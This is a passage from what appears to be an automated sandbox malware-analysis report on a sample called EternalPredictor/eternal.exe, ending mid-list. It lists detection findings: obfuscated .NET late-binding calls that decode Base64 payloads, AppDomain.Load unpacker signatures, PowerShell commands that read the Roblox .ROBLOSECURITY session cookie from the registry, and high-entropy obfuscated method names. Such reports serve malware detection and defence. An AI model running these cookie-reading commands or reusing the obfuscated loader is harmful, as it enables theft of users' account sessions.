                        Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[2],z7GL3GcSz0bU9xxBylPHvbaUX8.aUh9qYlzTyllGrbrPVeJLz9A4o4sfJf9qsZ9CQe2zFJG296vAZakwP5nCJA(Convert.FromBase64String(LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.U2xZS9Ii0bNLwN14STRo7hwBRPZhfM0aicc7EKEBlrFHxeDFy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.klGcTAcrhqPTSR6ORizJ2c7HcRMpsdc3i6nBTyBWta4vxEDVy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.e1a4iS5m2cwY7Wz4tf9JJh8YkbpTv1LUNuS5AGzigkLRqkULl,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.zddVe2zadHhHeDck7teLRxIVYabLIJuFmKSkvkzjoYfQwS95L,z7GL3GcSz0bU9xxBylPHvbaUX8.BvRcOGTXZLhNVW8VvUiYmleWf3IvqmgfkWjeLSwSzGNWB3uGR2J9VQkAvHh()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[2],z7GL3GcSz0bU9xxBylPHvbaUX8.aUh9qYlzTyllGrbrPVeJLz9A4o4sfJf9qsZ9CQe2zFJG296vAZakwP5nCJA(Convert.FromBase64String(LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.U2xZS9Ii0bNLwN14STRo7hwBRPZhfM0aicc7EKEBlrFHxeDFy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.klGcTAcrhqPTSR6ORizJ2c7HcRMpsdc3i6nBTyBWta4vxEDVy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.e1a4iS5m2cwY7Wz4tf9JJh8YkbpTv1LUNuS5AGzigkLRqkULl,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.zddVe2zadHhHeDck7teLRxIVYabLIJuFmKSkvkzjoYfQwS95L,z7GL3GcSz0bU9xxBylPHvbaUX8.BvRcOGTXZLhNVW8VvUiYmleWf3IvqmgfkWjeLSwSzGNWB3uGR2J9VQkAvHh()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[2],z7GL3GcSz0bU9xxBylPHvbaUX8.aUh9qYlzTyllGrbrPVeJLz9A4o4sfJf9qsZ9CQe2zFJG296vAZakwP5nCJA(Convert.FromBase64String(LSIheGR5jimET3JBt5sQs3uzkBQfaD2U2r8HNuqXo[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3 System.AppDomain.Load(byte[])
                        Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp System.AppDomain.Load(byte[])
                        Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3 System.AppDomain.Load(byte[])
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp System.AppDomain.Load(byte[])
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3 System.AppDomain.Load(byte[])
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp System.AppDomain.Load(byte[])
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: _2E6ai9TR6tMMsIluNA30k9trZCLJSDwrf8inyh3Qp
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4220350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FFBA4220350
                        Source: program.exe.0.drStatic PE information: real checksum: 0x7a2451 should be: 0x7a28dd
                        Source: eternal.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1db0f
                        Source: skuld.exe.0.drStatic PE information: section name: .xdata
                        Source: skuld.exe.0.drStatic PE information: section name: .symtab
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A1324AD push E95E523Bh; retf 2_2_00007FFB4A132589
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A132C0D push ecx; retf 2_2_00007FFB4A132C1C
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A13243D push E95E523Bh; retf 2_2_00007FFB4A132589
                        Source: C:\Users\user\AppData\Roaming\eternal.exeCode function: 2_2_00007FFB4A135E86 push cs; retf 2_2_00007FFB4A135E87
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4176008 push rsi; retf 8_2_00007FFBA417600B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4176058 push rbp; retf 8_2_00007FFBA417605B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4176038 push rbp; retf 8_2_00007FFBA4176043
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA4176068 push rsp; retf 8_2_00007FFBA417606B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA417AC25 push rcx; ret 8_2_00007FFBA417AC62
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60B4331 push rcx; ret 8_2_00007FFBA60B4332
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE0B0 push rsi; retf 8_2_00007FFBA66AE0BB
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE018 push rsi; retf 8_2_00007FFBA66AE04B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE010 push rsi; retf 8_2_00007FFBA66AE04B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE070 push rbp; retf 8_2_00007FFBA66AE073
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE060 push rsp; retf 8_2_00007FFBA66AE063
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE050 push rbp; retf 8_2_00007FFBA66AE053
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE048 push rbp; retf 8_2_00007FFBA66AE053
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE038 push rsi; retf 8_2_00007FFBA66AE04B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE030 push rsi; retf 8_2_00007FFBA66AE04B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AE028 push rsi; retf 8_2_00007FFBA66AE04B
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4990A8 push rbp; retf 8_2_00007FFBAA4990C3
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4990C0 push rbp; retf 8_2_00007FFBAA4990C3
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499068 push rbp; retf 8_2_00007FFBAA499073
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499038 push rbp; retf 8_2_00007FFBAA499053
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499058 push rsi; retf 8_2_00007FFBAA499063
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499050 push rbp; retf 8_2_00007FFBAA499053
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA499040 push rsp; retf 8_2_00007FFBAA499043
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4C7010 push rsi; retf 8_2_00007FFBAA4C7013
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4C7070 push rsp; retf 8_2_00007FFBAA4C7073
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4C7060 push rbp; retf 8_2_00007FFBAA4C7063
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4C7038 push rbp; retf 8_2_00007FFBAA4C7043
                        Source: eternal.exe.0.dr, PNTkHhRdRADo9Htu8dbFVLGTwqCu2qbzjYH5zYlur5KxgSz1jQZuw8evWYvsSGwZnSHAYTXqL6hUBfvaIp2CoAMx26V.csHigh entropy of concatenated method names: '_0c5osAYdBH9XJ94w4zO6l972AlhrdGad0hqnAFgCFDwSXcziYUz2q1XXqL3Zde5p35YLYKckiT7zmCnBswlBhvyUlKO', 'zTL2B64wg2rWQWqASrnYspHnl0Z1Aumla4SUxs4D64pQI2WON1JnzP1oGkeyMwLMnb0f8QieLG4h', 'rkr0zO6T26LPtwV3U9c2u5xYBuctzMPqkJXb8TIBxlUKlPIg8rAaiHfjLP71Hzw255mMcNkH7LQq', 'Btv4maALwmARX', 'HJNgJkbLwyzIr', 'EHT5RPoBsAnvY', 'U5FhaAIW2Nj2K', '_7zTNkjNQ0QD3c', 'hQgK5oM9YmxrQ', 'LnSuQAe3DhXZ2'
                        Source: eternal.exe.0.dr, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ea65l0P6VLiuAGdcSTuvjZVcwJgbGY1253l4vMwdSVADH492dX4PnHlSS35V2YM5c6dN3ZqKdkec', 'kOmiM1AbuLNjuLBf89wLzzjhN1Q3cqGGQEB6xJwPBYbBFOr4CSGH78YstQzx2itJcGbuOsGxLZKK', 'xGK7vCJFSYRW1gcvS6EUjMnJRR8OBcSkO5EdL9avx0j551WfeEgaTLxv1eSH4wQTZWjFIcRo4bUj', 'ERiYjJBn6pFxsGNYLGgy8QzMDp73EOBHgudvczYH3MSATieVEHc6hvYTbAy3glIC6sE2LzEEvOMf'
                        Source: eternal.exe.0.dr, ZTVYtJFrmsQJQ9ljOwNBcyaFo9DitMyOY4oipU4ny.csHigh entropy of concatenated method names: 'NoCle4xZmufxswDeh5fhpTUgoSAb5eavmQrRgKskO', 'zZWCPg3bEKG534TZwNRhlqsIneV7P6FWDiwU', '_2yRRy4y5sBKarxi31GYBsSZgy2BbH10JSslb', 'f9J0BO2UoDn7uyJSkFmSMqD2U0CLAbQJIjKF', 'jF9RGodWK3s5qoVwiawclr9bGbBnIk6BZnQH'
                        Source: eternal.exe.0.dr, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csHigh entropy of concatenated method names: 'k06g0iCbZCrfysspSRMUJhlvYv79m1SSzswTsLBuX8Uz3rCOToqYxOxgf2zC01crRWspIvgXQ8oEiE7TM', '_7zpgzbS6PiDyDJENNtstPc6AcDWETdl9qa8VBBfjip0JV0wNKaiUYqCSDNhWBNrFA2q5hZsTYIrwXV9eo', 'efanD038HcFIAEn81JcePjTZcmuYEb18URcxTmSvOhAn2vjbQL2CvMLKx5U8ELzWTMGmNEUgxjPFbQEUH', 'S6TBniyDwO1QE4SgIJD32eq9ggNzFjSC7eVHzx0pqJHhS5zDr1NKfdFiZ950zBN5SCgKu9PCd5pNKgRd4', '_5NB66cSsdfZl1wYpuBTFxnfbtIFkKthngYBP7aJYPI8h0KaVs8ob5oRSiwXQ0WpBTp3oQYyd9hCBeebIi', '_8auKXwrMjrWK6GETcQFbdg3Vp79uUUIPDb9Sy4WFo66QIUaj0mFhsh0uP1EDWfjJPZhOohG04ClP6EwKU', 'eZLULBsWHjkkBfq6UUkYqvjdfep7gP0Jsax6nfq8yPBu0kvptOtgeoAB89ekjARl0orRbLzx8vIrJJNzz', 'Uqe2k6rcLSu5PX1j4tOqUiz3AsHedfpnumnQKYbU0ZFOajGepCrXgVlcsAJjGLiJ3YS24bwh0hfa1TXHx', 'fPrS3IoE8AU3qNIg9y0bwAv5b2OwoCgc90vr3Dv9sCQsynP59RPumSLyr7wt2Q86BBiUuUlWpbuS75vgr', '_1bidLvfGyo8kT6sraMlH8OWiBDlbh3JTvPbdsjQ5ks4b8uEikoXH93LqXuA3XXmZXSrsBs1I2EenFSSKB'
                        Source: eternal.exe.0.dr, 07Cdq7Slaf2T0jZczBuwyUXHac.csHigh entropy of concatenated method names: 'aNTMw6Lu16q3XeWHR1sR3PMWSc', '_85n0wGBYXzEAGGt4l8PGE0RDXu', 'CTQ4WASzc8s72DCU4qjXS0CXRl', 'Pc3Yhm8jNS8GFjGCj9zEGX6vS0', '_4SJw3T4IWGV1RB84xPDOcTwCH0BWzCDx7Cv9O75zcJBpdLzVGT2sJz', 'V7c4x1ZactwY6IDS1gx8EozmV7NQKodI3NEVUIzH9cdwub65IquqG5', 'tSoF4ErRLVczkRNY4oAHQYpg18er1hxx2JuiJvKNPus0RjONzUM9Ty', 'cReP19Usgw2ijL8SFqsFgwdEKNtvIYJq2VudLBTLJe7lL7ul2XGIKU', 'KrU1gipWTZPHUOXxkvD6LuPOmDsvj4AojcsA06vZMleEQghmaWD9sW15aZKDoJY72JOLWqRzXCo68c64eXudEf', 'w2J7OZ6KgMoKAlYfNB0Zamm0AZZpzVfIOcLbbErEWdfgG9fasIJXDTSSjeekkiQQ54pP4m3ld4E0FbrPz2HFkh'
                        Source: eternal.exe.0.dr, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.csHigh entropy of concatenated method names: 'eZmacRaUJwyo2V4YVB3fpVPcLirYMs9NgnkwDjFGp', 'd85CNq0UL5V9VHkpmg49vGPNv2eivxNFlfn6SA8Wa', 'aaPTnTrt8Ym4okXALJ8ARVYV41jgbEBIV1xhS5jpX', 'TipMraploFbtSJXkrL2wl7mQA2', '_8kYnfx2Lev1BuxUf3rf6rrRChf', 'YZm91ip80fd4eMng8qFrdBzNCg', 'IVWmqzIBjqA6oT2vjG5RkSmRor', 'Pr3QotefBmeLPnEJGZAv75JZ0Z', 'UxwYolw5crzg8rmsMOEamrwCXu', 'Sy558Qu3s6mdrFllG7ujEwVbsF'
                        Source: eternal.exe.0.dr, z7GL3GcSz0bU9xxBylPHvbaUX8.csHigh entropy of concatenated method names: 'rczOseSIc2vnwuEKIR8PkcLmQa', '_04nQsc5SubxMuXJO3AjPmX0xdl', 'hFjVWq8dAgGwLNBrQoIeKlZxVQ', 'HcqlO99QRe4SHd8BzMhTs7NGM5', 'l7FpTzsY57NomzQ8RfXN2HkWPh', 'PPwLymJlD5IyaA6OX8oJLKE2eo', 'j0lPXeA3krUBU4eIKwHZCHQo8t', 'JF3URgxYwq9OQvJS00u8hCO5H8vqmWwDRbmYItsSowCm6gCXAbEsZZZmIQL', 'nwctXyVSHKGY5OLwe9fqeakonwIxFSDgOXORZzO0z6k9imOZ8ltZE3IN43d', 'yRMsRhBMjHLebAC07aypKk8Xvd0Fr7wd5MRrNJbh59gRGeUCPCNh0DRN0FX'
                        Source: eternal.exe.0.dr, pwLyC8IGS9fWPw8AOOpq13VTDw.csHigh entropy of concatenated method names: 'q75ROLrqqHV6EmJDp91TOI4VmT', 'ZtBBrD6v9t5iKcxfvJFaw3H4IuoDdY5nuT9puJXpLcjL76IDfgCpHRRBmpJVtKBkLCrPDQOodEZjpRwSz7URN3', 'vfjRU45nEBY3auUaODMgdMoHtc4K9VQz4xOTtGT5Rs8N0nXwNGPIEGNdyM7MGhG3uPvvrFFxSVofALVPdeAZNJ', 'icSHmmvwaVgso4j8Hv3S4II3minVb10MWs5SQ63NpOLDYpHqrGopkznqOvYHFNLP1M4QnYgENy3C06mTgfD2bh', 'dpGjJ3p87EOacCY2vM0V24nVRlbrIREh0oXDjE2lWXatKNNzmuZcRV5SWjWaJ4VPQdH04vzaLiesjPJ7syopT7'
                        Source: eternal.exe.0.dr, YQhejhVgT0ttgMOLyMJxgFpqD9cch4ZRZCw8NY2M6T1GDPhoPLEM2UjD1FgvZhc5VommPhvhtQvJWFL27.csHigh entropy of concatenated method names: 'v2ZikujqPLr1n6uIoVRgCl1pTavRWrBtjGZIRMgHAOgEZQHb0xl2UCVnjLOjvu4tr2gJgE8b2IxKZqqDE', 'Te60wYfmJ74mvSBCHY9Q1NYDhkeXswsJzyOxyUzGodjeG1TZQE5uz4gUMoPwHqZv0IL8rkrclqK6sLhXa', 'lOttlYb7JhxgqWLTIpZwgApjN4IiY5lALQP1k3zDtevLeLQ0arZpIFqdSuNqZ8CtJBvaQamVZPkdJjEK1', 'HklCUKPtoD7xqi5SydpzGBxTnIL1tsIxMdr9pI26Q8FfUeLJE80eMifz2MCiXpMquyZr2BP9gg7FY6Swm', 'mBYQhshBfowyxxw0DF', 'v0fl2bSQlrkwGParpN', '_0oISgafl1pHFtQOk9c', 'VFkzUzAnj429d1yALh', 'cKM0CQlApexIk8yDHx', 'wHzUyYnhv4EPtZktOH'
                        Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.csHigh entropy of concatenated method names: 'rWgDNtD9XClx2ePX1ClUNtaUKXAVpqLIPamcaShgPjX2GXhFnNddcug1dnCUVYeOGwlDB6awhp2LkVuNJqgnwhfzwZjoQTdYyJG', 'o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3', '_15xvhav5CsVbhcaBatgprc9bhSzTJ2Uj711MIImyF1pfHIQjLdp07HnJ6Q9SOa16zKy7DsQpO2JWsPV7aDbHYdZ9PtIwNdYGFOd', 'ilP62xKpQqTx9U2gHfS6thNHObDbYplWekVrvTfo6xzmjbv8zdAIZrapg5YqVmvuy9ANsaQ0gu716iUEjF66cZiDs1qBN0Z8sFX', '_1L4pbsWDZhKfHZBBMpDwYw8KMuVu0BHVfRoCyfa35ApP31Z07D2DM4tFjH8jSVYQ9cOiCebiaAyTg20NpIeGtPKSRB8UwLiaqJT', '_0iQVfid5km9BaIMjdJ7jvr4wgk63gqvsqAq9Cv3kDD3NTRPAeUNHUqCLeRLZcYxPwS5AFnpc0guTCN7dVAqvD7i8KE5MAiBWpEC', 'F8JSf8qjcOEGjxHWRDmywmiPNV7vP3RrfeN2DwhBNngzTla9b4eZlM2atVYZ5NqxOn9LEJk8fYy3AAZa8cNBZf5CRMGD8l0dYIO', 'WWdZkn7NhLGtutIFzAPRtfYm50evObQXhtDpar21v', 'twLqMQQuRzHiNTomU0HgBk9BDJiIXnidwc25S9R7S', 'jYqvBynZ9drCFVMYmQPpIj8VpTcr4G6PjM7ybOXXz'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, PNTkHhRdRADo9Htu8dbFVLGTwqCu2qbzjYH5zYlur5KxgSz1jQZuw8evWYvsSGwZnSHAYTXqL6hUBfvaIp2CoAMx26V.csHigh entropy of concatenated method names: '_0c5osAYdBH9XJ94w4zO6l972AlhrdGad0hqnAFgCFDwSXcziYUz2q1XXqL3Zde5p35YLYKckiT7zmCnBswlBhvyUlKO', 'zTL2B64wg2rWQWqASrnYspHnl0Z1Aumla4SUxs4D64pQI2WON1JnzP1oGkeyMwLMnb0f8QieLG4h', 'rkr0zO6T26LPtwV3U9c2u5xYBuctzMPqkJXb8TIBxlUKlPIg8rAaiHfjLP71Hzw255mMcNkH7LQq', 'Btv4maALwmARX', 'HJNgJkbLwyzIr', 'EHT5RPoBsAnvY', 'U5FhaAIW2Nj2K', '_7zTNkjNQ0QD3c', 'hQgK5oM9YmxrQ', 'LnSuQAe3DhXZ2'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ea65l0P6VLiuAGdcSTuvjZVcwJgbGY1253l4vMwdSVADH492dX4PnHlSS35V2YM5c6dN3ZqKdkec', 'kOmiM1AbuLNjuLBf89wLzzjhN1Q3cqGGQEB6xJwPBYbBFOr4CSGH78YstQzx2itJcGbuOsGxLZKK', 'xGK7vCJFSYRW1gcvS6EUjMnJRR8OBcSkO5EdL9avx0j551WfeEgaTLxv1eSH4wQTZWjFIcRo4bUj', 'ERiYjJBn6pFxsGNYLGgy8QzMDp73EOBHgudvczYH3MSATieVEHc6hvYTbAy3glIC6sE2LzEEvOMf'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, ZTVYtJFrmsQJQ9ljOwNBcyaFo9DitMyOY4oipU4ny.csHigh entropy of concatenated method names: 'NoCle4xZmufxswDeh5fhpTUgoSAb5eavmQrRgKskO', 'zZWCPg3bEKG534TZwNRhlqsIneV7P6FWDiwU', '_2yRRy4y5sBKarxi31GYBsSZgy2BbH10JSslb', 'f9J0BO2UoDn7uyJSkFmSMqD2U0CLAbQJIjKF', 'jF9RGodWK3s5qoVwiawclr9bGbBnIk6BZnQH'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csHigh entropy of concatenated method names: 'k06g0iCbZCrfysspSRMUJhlvYv79m1SSzswTsLBuX8Uz3rCOToqYxOxgf2zC01crRWspIvgXQ8oEiE7TM', '_7zpgzbS6PiDyDJENNtstPc6AcDWETdl9qa8VBBfjip0JV0wNKaiUYqCSDNhWBNrFA2q5hZsTYIrwXV9eo', 'efanD038HcFIAEn81JcePjTZcmuYEb18URcxTmSvOhAn2vjbQL2CvMLKx5U8ELzWTMGmNEUgxjPFbQEUH', 'S6TBniyDwO1QE4SgIJD32eq9ggNzFjSC7eVHzx0pqJHhS5zDr1NKfdFiZ950zBN5SCgKu9PCd5pNKgRd4', '_5NB66cSsdfZl1wYpuBTFxnfbtIFkKthngYBP7aJYPI8h0KaVs8ob5oRSiwXQ0WpBTp3oQYyd9hCBeebIi', '_8auKXwrMjrWK6GETcQFbdg3Vp79uUUIPDb9Sy4WFo66QIUaj0mFhsh0uP1EDWfjJPZhOohG04ClP6EwKU', 'eZLULBsWHjkkBfq6UUkYqvjdfep7gP0Jsax6nfq8yPBu0kvptOtgeoAB89ekjARl0orRbLzx8vIrJJNzz', 